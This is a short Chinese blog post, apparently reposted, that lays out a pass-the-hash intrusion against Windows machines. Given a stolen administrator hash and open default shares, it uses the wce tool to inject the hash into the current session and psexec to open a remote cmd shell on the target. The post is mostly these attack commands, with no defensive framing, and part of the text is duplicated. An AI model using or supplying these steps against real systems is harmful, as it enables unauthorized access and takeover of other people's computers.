前提:
1.获取到目标的管理员帐户hash
2.目标开放了默认共享端口
实施:
1.使用wce工具把目标的sessions设置为当前的session
wce -s Administrator:500:×××87EEB66D08E08770:×××E22B1DFBFA6072
在建立共享连接后,直接使用psexec.exe操作,详见参数说明,替换上面所有指令
直接 psexec \\remoteIP cmd.exe 返回目标cmd
本文共 278 字,大约阅读时间需要 1 分钟。
前提:
1.获取到目标的管理员帐户hash
2.目标开放了默认共享端口
实施:
1.使用wce工具把目标的sessions设置为当前的session
wce -s Administrator:500:×××87EEB66D08E08770:×××E22B1DFBFA6072
转载于:https://blog.51cto.com/venglu/1185143